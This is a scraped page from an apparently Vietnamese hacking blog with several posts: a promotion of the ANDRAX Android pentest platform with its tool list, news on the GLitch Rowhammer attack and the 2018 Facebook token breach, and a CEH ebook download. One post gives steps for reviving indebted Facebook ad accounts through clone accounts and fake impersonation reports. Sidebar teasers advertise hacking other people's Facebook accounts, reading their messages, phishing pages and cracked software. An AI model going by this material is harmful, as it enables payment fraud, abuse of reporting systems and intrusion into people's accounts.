ANDRAX được thiết kế chạy một cách trơn tru trên android, nó có thể chạy giống như một linux distribution nhưng lại mạnh hơn rất nhiều 😀

Tại sao nhà phát triển nhắm tới Android mà không phải hệ điều hành nào khác?

Đơn giản mà nói, cho tới thời điểm hiện tại thì hầu như mọi người đều có điện thoại thông minh và dành rất nhiều thời gian cho nó! Hơn nữa, kiến trúc bộ vi xử lý của hầu hết các điện thoại thông minh chạy Android là ARM, một kiến trúc hiện đại và mạnh mẽ cực kỳ vượt trội so với các kiến trúc khác.

Đọc đến đây chắc bạn cũng đang thắc mắc tại sao dùng ANDRAX mà không phải NetHunter ( Android OS của Kali Linux). Tuy nhiên về mặt kỹ thuật, ANDRAX và NetHunter không bao giờ được so sánh, vì ANDRAX là nền tảng penetration testing platform cho điện thoại thông minh Android còn NetHunter chỉ là trình giả lập Debian chạy với chroot.

Tiếp theo đó, mình cũng không nói quá nhiều về Termux trong bài viết này, Termux là một ứng dụng cho phép cài đặt nhiều gói Linux sử dụng môi trường Debian chạy tự nhiên trên Android. Theo đó, ANDRAX và Termux có sự phát triển tương tự, hai phần mềm này chia sẻ nhiều tài nguyên thư viện và GNU / Linux.Tuy nhiên Termux không phải là một nền tảng thử nghiệm thâm nhập, nó chỉ là phần mềm để đưa các công cụ cơ bản được tìm thấy trong môi trường Debian. Mục đích sử dụng của nó không phải là pentest.Đương nhiên bạn vẫn có thể cài đặt nhiều công cụ thủ công trong Termux nhưng sẽ rất khó để tận dụng được 100%, thêm vào đó Termux chạy chỉ với quyền user thường mà rất nhiều tool hack lại cần tới quyền root để thao tác.

Danh sách các công cụ trong ANDRAX

Information Gathering

  • Whois
  • Bind DNS tools
  • Dnsrecon
  • Raccoon
  • DNS-Cracker
  • Firewalk

Scanning

  • Nmap – Network Mapper
  • Masscan
  • SSLScan
  • Amap

Packet Crafting

  • Hping3
  • Nping
  • Scapy
  • Hexinject
  • Ncat
  • Socat

Network Hacking

  • ARPSpoof
  • Bettercap
  • MITMProxy
  • EvilGINX2

WebSite Hacking

  • 0d1n
  • Wapiti3
  • Recon-NG
  • PHPSploit
  • Photon
  • XSSer
  • Commix
  • SQLMap
  • Payloadmask
  • AbernathY-XSS

Password Hacking

  • Hydra
  • Ncrack
  • John The Ripper
  • CRUNCH

Wireless Hacking

  • VMP Evil AP
  • Aircrack-NG Tools
  • Cowpatty
  • MDK3
  • Reaver

Exploitation

  • RouterSploit Framework
  • MetaSploit Framework
  • Getsploit
  • OWASP ZSC
  • Rop-TOOL

Tất nhiên là còn nhiều công cụ khác mà mình không thể list toàn bộ ra đây được 😀

Pentest Platform với terminal nâng cao

Dynamic Categories Overlay (DCO)

Các công cụ được chia thành từng nhóm để bạn dễ dàng tìm và sử dụng cũng như biết trước mục đích của chúng.

IDE nâng cao, hỗ trợ nhiều ngôn ngữ

Demo một số hình ảnh quá trình Infomation Gathering

Chi tiết về công cụ các bạn có thể xem thêm tại trang chủ.

Link trang chủ và link tải công cụ :

[mks_button size=”large” title=”Tải công cụ” style=”squared” url=”http://vnurl.xyz/GhZ1bHP8″ target=”_blank” bg_color=”#1e73be” txt_color=”#FFFFFF” icon=”” icon_type=”” nofollow=”1″]

loading...

Share tut kích nợ Facebook 2018 cơ bản

0
SHARE TUT KÍCH NỢ FACEBOOK CƠ BẢN
Tut kích nợ này mình vừa test thì vẫn còn thấy hoạt động khá ok nên chia sẻ cho mọi người tut kích nợ Facebook cơ bản. Đây chỉ là tut cơ bản mà mình hay dùng, còn các cao nhân nào có ý kiến hay có cách hay hơn thì có thể chia sẻ, mình luôn sẵn sàng đón nhận, không yêu đừng nói lời cay đắng 😀

 

[sociallocker id=”2880″]

Bước 1 : Share tài khoản nợ về 1 nick (dùng clone trắng cho dễ, nên add thẻ sẵn vào tài khoản,tài khoản nợ trên 2 tháng dễ kích)

Bước 2: Rip cho nick đó checkpoint 72h, hoặc FAQ mạo danh…
Bước 3: Unlock nick đó ( vài giờ – 1 2 ngày)
Chỉ vậy thôi 😀 Tài khoản nợ của bạn sẽ lại ok và chạy tiếp bình thường.

[/sociallocker]

Thường thì mình dùng checkpoint 72h vì nó sẽ nhanh hơn. Còn cách checkpoint 72h như nào thì các bạn lên mạng google là ra ngay :D. Còn muốn làm FAQ mạo danh, thì các bạn có thể tự làm hoặc tìm người. Tốt nhất là share vào clone dễ Rip rồi làm. Chúc các bạn thành công 😀
loading...

Tìm hiểu về Glitch – kỹ thuật tấn công ‘Rowhammer’ mới có thể hack điện thoại Android từ xa

0
rowhammer hack android từ xa
rowhammer hack android từ xa

Lần đầu tiên, các chuyên gia bảo mật đã phát hiện ra cách khai thác hiệu quả một kỹ thuật hack 4 năm tuổi – Rowhammer – nhằm chiếm quyền điều khiển một chiếc điện thoại Android từ xa.

android virus

Được gọi là GLitch, kỹ thuật PoC này là phần mới nhất trong chuỗi tấn công Rowhammer. Nó thúc đẩy các đơn vị xử lý đồ họa nhúng (GPU) thực hiện một cuộc tấn công Rowhammer nhắm vào smartphone Android.

Rowhammer là vấn đề xảy ra với dòng chip bộ nhớ truy cập ngẫu nhiên động (DRAM) gần đây. Khi người dùng truy cập liên tục vào một row bộ nhớ sẽ gây ra “bit flipping” trong một row liền kề. Điều này cho phép bất cứ ai cũng có thể thay đổi giá trị của nội dung được lưu trữ trong bộ nhớ máy tính.

Vấn đề này được biết đến từ năm 2012. Đến năm 2015, nhóm nghiên cứu Project Zero của Google đã khai thác nó sâu hơn khi họ ngăn chặn các cuộc tấn công Rowhammer từ xa trên các máy tính Windows/Linux.

Năm 2017, các nhà nghiên cứu của Phòng thí nghiệm VUSec tại Vrije Universiteit Amsterdam đã chứng minh rằng kỹ thuật Rowhammer cũng có thể hoạt động trên smartphone Android. Tuy nhiên nó vẫn mang hạn chế vì là một ứng dụng độc hại mới lần đầu được cài đặt điện thoại mục tiêu.

Tuy nhiên, một nhóm nghiên cứu khác đã cho thấy cuộc tấn công PoC GLitch của họ có thể khai thác kỹ thuật tấn công Rowhammer bằng cách rất đơn giản. Đó là lưu trữ một website chạy mã JavaScript độc hại để hack một chiếc smartphone Android từ xa chỉ trong 2 phút, mà không dựa vào bất kỳ lỗi phần mềm nào.

Vì chỉ chạy trong các đặc quyền của trình duyệt web, nên mã độc có thể theo dõi hoặc lấy cắp thông tin đăng nhập của người dùng. Tuy nhiên, hacker không thể chiếm quyền truy cập vào điện thoại Android của họ.

Đây là cách hoạt động của cuộc tấn công GLitch

Video: https://youtu.be/YniqBaSK-Eg

GLitch là kỹ thuật Rowhammer từ xa đầu tiên khai thác các đơn vị xử lý đồ họa (GPU) – được tìm thấy trong hầu hết các bộ xử lý di động. Trong khi tất cả phiên bản tấn công giả thuyết trước đây đều khai thác CPU.

Các bộ vi xử lý ARM bên trong smartphone Android chứa một loại bộ nhớ cache đã hạn chế việc truy cập vào các row bộ nhớ. Do vậy, các nhà nghiên cứu đã dùng GPU có chứa bộ nhớ cache dễ điều khiển hơn, nhưng lại cho hacker cơ hội tấn công row mục tiêu mà không gặp bất kỳ cản trở nào. Kỹ thuật này được đặt tên là GLitch. Hai chữ cái đầu của GLitch được viết hoa vì nó sử dụng một thư viện mã đồ họa phổ biến (được gọi là WebGL) để hiển thị đồ họa, gây ra sự cố trong bộ nhớ DDR3 và DDR4.

Hiện tại, GLitch nhắm vào smartphone chạy hệ điều hành Snapdragon 800 và 801 trên chip (gồm cả CPU và GPU). Nghĩa là PoC chỉ hoạt động trên smarphone Android đời cũ hơn như LG Nexus 5, HTC One M8 hoặc LG G2. Cuộc tấn công có thể được khởi chạy với Firefox và Chrome.

Tấn công Rowhammer có thể chiếm quyền máy tính từ xa qua mạng

Việc gửi các gói tin độc hại qua mạng LAN có thể gây ra tấn công Rowhammer trên hệ thống chạy card mạng Ethernet được trang bị RDMA. RDMA chính là thiết bị Truy cập bộ nhớ trực tiếp từ xa, thường được sử dụng trong cloud và data center. Đây là phát hiện mới nhất của các nhà nghiên cứu tại Vrije Universiteit Amsterdam và Đại học Cyprus.

Thẻ mạng hỗ trợ RDMA cho phép các máy tính trong mạng trao đổi dữ liệu (với quyền đọc và ghi) trong bộ nhớ chính. Do đó, việc lạm dụng nó để truy cập vào bộ nhớ của máy chủ có thể kích hoạt bit flips trên DRAM. Tuy nhiên, việc kích hoạt bit flip đòi hỏi hàng trăm nghìn bộ nhớ truy cập đến các vị trí DRAM cụ thể trong vòng hàng chục mili giây. Do đó, muốn tấn công Throwhammer thành công cần có mạng tốc độ rất cao, ít nhất là 10Gbps.

Không có bản vá phần mềm nào khắc phục hoàn toàn vấn đề Rowhammer

Rowhammer khai thác điểm yếu phần cứng, nên không có bản vá phần mềm nào khắc phục hoàn toàn lỗi này. Chính vì vậy, nó có thể gây ra những thiệt hại nghiêm trọng.

Mặc dù không có cách nào để chặn hoàn toàn một GPU của smartphone Android khỏi việc giả mạo DRAM, nhưng các chuyên gia đã nỗ lực làm việc với Google để giải quyết vấn đề này.

Nguồn: thehackernews

loading...

Chia sẻ miễn phí tài liệu học hack Ebook CEH v10

0
Ebook CEH v10
Chia sẻ bộ tài liệu hacking CEH V10 đầy đủ các chương

CEH là từ viết tắt của Certified Ethical Hacker, một chứng chỉ cực kì uy tín về bảo mật của Ec-Council. Tại Việt Nam, các cá nhân sở hữu chứng chỉ CEH có trình độ tương đương CEH là mục tiêu săn lùng của các công ty, ngân hàng, bảo hiểm, các tổ chức tín dụng tiền tệ cùng các đơn vị bảo mật chuyên nghiệp.

Bạn nào đam mê hacking thì chắc chắn sẽ biết về bộ tài liệu cực kì chi tiết này. Mặc dù có rất nhiều các loại tài liệu khác tuy nhiên theo cá nhân mình đánh giá thì tài liệu CEH là “ngon” nhất vì được cập nhật thường xuyên, minh họa dễ hiểu, ví dụ thì luôn lấy đủ trường hợp để bạn không bị bỡ ngỡ nếu gặp phải một trường hợp mới. Bộ mới nhất hiện tại là V10 và hôm nay mình sẽ chia sẻ cho các bạn tập tài liệu hack này. Đừng quên tải ngay về để một lúc nào đó cần nâng cao kiến thức thì đây là một sự lựa chọn không thể bỏ qua.

Ebook CEH v10
Chia sẻ bộ tài liệu hacking CEH V10 đầy đủ các chương

Mục lục 20 chương cực hay trong sách

  1. Introduction to Ethical Hacking
  2. Footprinting and Reconnaissance
  3. Scanning Networks
  4. Enumeration
  5. Vulnerability Analysis
  6. System Hacking
  7. Malware Threats
  8. Sniffing
  9. Social Engineering
  10. Denial-of-Service
  11. Session Hijacking
  12. Evading IDS, Firewalls, and Honeypots
  13. Hacking Web Servers
  14. Hacking Web Applications
  15. SQL Injection
  16. Hacking Wireless Networks
  17. Hacking Mobile Platforms
  18. IoT Hacking
  19. Cloud Computing
  20. Cryptography

Sau khi học xong bộ tài liệu này và hiểu hết, thì bạn có thể tự tin các phần kiến thức về phân tích malware, trojan, các cách DDOS và phòng ngừa, SQLi và rất nhiều kiến thức quan trọng khác.

Link tải free ebook CEH V10 full :

[mks_button size=”large” title=”DOWNLOAD NGAY” style=”squared” url=”https://ouo.io/oWq45″ target=”_blank” bg_color=”#1e73be” txt_color=”#FFFFFF” icon=”fa-file-o” icon_type=”fa” nofollow=”1″]

Chúc các bạn học tập thật tốt ^^

loading...

Facebook bị hack, hơn 50 triệu tài khoản ảnh hưởng

0

Facebook cho hay họ đang điều tra vụ việc. “Chúng tôi không biết ai đứng đằng sau vụ việc này”, đại diện Facebook nói.

FacebookFB (NASDAQ) vừa cho biết một cuộc tấn công quy mô lớn vừa nhằm vào hệ thống máy tính của công ty này. Hacker đã có được hơn 50 triệu thông tin tài khoản người dùng.

50 triệu tài khoản bị hack, 90 triệu bị buộc log out

Theo New York Times, lỗ hổng được phát hiện vào hôm 25/9, khai thác lỗi liên quan đến tính năng “view as”, giúp người dùng có thể tự xem lại trang cá nhân của mình hiển thị như thế nào trong mắt bạn bè.

Từ lỗ hổng này, hacker có thể chiếm đoạt được tài khoản người dùng bằng cách sử dụng chuỗi mã token – mã dùng để đăng nhập Facebook mỗi khi người dùng nhập tài khoản và mật khẩu mà không cần bảo mật hai lớp hay cảnh báo đăng nhập.

Trước đây, mã token thường bị hacker đánh cắp bằng cách dụ dỗ người dùng cấp quyền cho các ứng dụng bên thứ ba. Tuy nhiên trong lần tấn công này, tin tặc lấy nó trực tiếp từ Facebook.

Hơn 90 triệu người dùng Facebook bị buộc đăng xuất khỏi tài khoản của mình vào sáng thứ 6 (28/9), nhằm tránh bị tấn công.

Trong số này, có 50 triệu tài khoản bị ảnh hưởng trực tiếp. Facebook đã reset 50 triệu token bị ảnh hưởng, cộng thêm 40 triệu token “dự phòng”, gồm những người dùng đã sử dụng tính năng “view as” trong vòng nửa năm qua.

Facebook nói gì?

Facebook cho biết cuộc điều tra chỉ mới diễn ra. Công ty này chưa thể xác định được nguồn gốc, danh tính những kẻ tấn công, cũng như mức độ bị ảnh hưởng một cách đầy đủ.

“Chúng tôi chưa xác định liệu các tài khoản này có bị sử dụng cho mục đích nào hay không. Chúng tôi cũng không biết ai là người đứng đằng sau những cuộc tấn công này”, Guy Rosen, Phó chủ tịch quản lý sản phẩm của Facebook cho biết.

Đây là vụ hack nghiêm trọng nhất từ trước đến nay trong lịch sử phát triển của Facebook.

Facebook cho biết hiện công ty đã thiết lập các chính sách chia sẻ dữ liệu chặt chẽ với bên thứ ba, đồng thời hạn chế thông tin mà hãng sẽ chia sẻ với các nhà phát triển trong tương lai. Công ty đã tạm đóng quyền truy cập hơn 400 ứng dụng bên thứ ba, sau khi phát hiện có hàng nghìn ứng dụng loại này được kết nối với Facebook.

Hiện tại Facebook đã tắt tính năng “View As” để tiếp tục kiểm tra lại về bảo mật. Quá trình điều tra vẫn đang tiếp tục, và các tài khoản có liên quan sẽ còn bị reset token trong vài ngày tới.

“Tôi muốn cập nhật cho các bạn về một vấn đề bảo mật quan trọng mà chúng tôi đã xác định. Chúng tôi đã khắc phục vấn đề này vào tối qua và đang áp dụng các biện pháp phòng ngừa cho những người có thể đã bị ảnh hưởng. Chúng tôi vẫn đang điều tra, nhưng tôi muốn chia sẻ những gì chúng tôi đã phát hiện”, Mark Zuckerberg viết trên Facebook cá nhân.

“Hôm thứ 3, chúng tôi phát hiện ra một kẻ tấn công, khai thác lỗ hổng kỹ thuật để ăn cắp mã thông báo truy cập cho phép họ đăng nhập vào khoảng 50 triệu tài khoản của mọi người trên Facebook.

Chúng tôi đã thực hiện một số bước để giải quyết vấn đề này. Chúng tôi vá lỗ hổng bảo mật để ngăn kẻ này hoặc bất kỳ kẻ nào khác có thể lấy cắp mã token đăng nhập. Chúng tôi đã vô hiệu hóa mã thông báo truy cập cho 50 triệu tài khoản bị ảnh hưởng”, Zuckerberg nói thêm.

Người dùng cần làm gì?

Facebook khuyên người dùng không cần đổi password. Tuy nhiên, với những người dùng không thể đăng nhập vào Facebook, nên truy cập mục Help Center để được hướng dẫn.

Nếu muốn cẩn thận hơn và tự đăng xuất khỏi tài khoản Facebook, bạn có thể vào mục “Security và Login” trong cài đặt. Tại đây, tất cả phiên và vị trí đăng nhập sẽ được liệt kê. Người dùng có thể thoát tài khoản Facebook tại mọi thiết bị đang đăng nhập.

Niềm tin lung lay

Cuộc tấn công diễn ra trong giai đoạn được xem như khó khăn nhất trong lịch sử mạng xã hội lớn nhất thế giới. Facebook buộc phải làm rõ vai trò của mình trước cáo buộc bị Nga lợi dụng trong cuộc bầu cử Tổng thống Mỹ 2016.

Ngoài ra, những chỉ trích về vụ bê bối bán dữ liệu cho Cambridge Analytica vẫn chưa lắng xuống. Nhiều luồng ý kiến tại Washington cho rằng phải có những quy định cứng rắn hơn khi mạng xã hội này đang nắm trong tay quá nhiều quyền lực.

Theo New York Times, thách thức lớn nhất đặt ra với Facebook lúc này là làm sao chứng tỏ với người dùng hãng có đủ khả năng, trách nhiệm để xử lý an toàn lượng dữ liệu khổng lồ thu thập mỗi ngày. Hơn 2 tỷ người sử dụng Facebook và 2 tỷ người dùng WhatsApp mỗi tháng, ứng dụng thuộc sở hữu của Facebook.

“Chúng tôi có trách nhiệm bảo vệ dữ liệu người dùng. Nếu không làm được, chúng tôi không xứng đáng phục vụ các bạn”, CEO Mark Zuckerberg từng chia sẻ trong vụ bê bối liên quan đến Cambridge Analytica hồi đầu năm nay.

Nguồn : Zing

loading...
cách hack nick facebook của người khác

Cách hack nick facebook bằng điện thoại

50
Facebook là mạng xã hội được cộng đồng mạng sử dụng nhiều nhất hiện nay. Dưới đây chúng tôi sẽ hướng dẫn bạn đọc...

Hướng dẫn đọc trộm tin nhắn facebook qua token

80
Trong bài viết này AD sẽ hướng dẫn các bạn đọc trộm tin nhắn facebook của người khác mà không cần biết email, mật...

Chia Sẻ Tool ATP của ATP Software Cracked

198
Cập nhật ngày : 25/10 : Đã fix lại link AD chia sẻ lại bộ Tool ATP của ATP Software đã được crack thành công cho mọi...

Làm thế nào để trở thành Hacker ( Part 7) – hackerrank

2
PART 7 hackerrank 42 . ) Kỹ thuật ấn công DoS vào WircSrv Irc Server v5.07 : _ WircSrv IRC là một Server IRC thông dụng trên...

Hướng dẫn hack pass Wifi WPA/WPA2-PSK

26
Mặc dù trên mạng có rất nhiều công cụ và hướng dẫn cách hack wifi WPA/WPA2 - PSK, thậm chí có cả cách hack...

Hướng dẫn mở nick facebook bị report

9
CÁCH mở nick facebook bị report 1/nên xài cmnd thật . kháng nghị xong vô mail reply theo mẫu 13t và 14t —————————————————————————————– Hi Team Facebook. Please check...

Hack nick facebook bằng trang web giả- phising page

10
Phishing là gì ? Tìm hiểu phương thức Phishing ! Phishing phương thức tạo ra những trang web giả một cách tinh vi để dụ dỗ những người...
cách lấy lại tài khoản facebook bị mất

Cách lấy lại tài khoản facebook bị mất

2
Lấy lại tài khoản facebook  - Các bạn biết đấy Facebook là mạng xã hội lớn nhất hiện nay với số lượng người dùng...

Cấu Trúc If … Else Trong Ngôn Ngữ C++

3
Cấu trúc c++: giới thiệu   Trong quá trình viết các chương trình, bài toán của chúng ta thường xuất hiện các trường hợp khác nhau...

Hack nick facebook người khác trong 2 phút [ 2017 ]

21
Giới thiệu kĩ thuật hack nick facebook : Trong bài viết này mình sẽ giới thiệu cho các bạn một cách hack nick facebook người khác trong...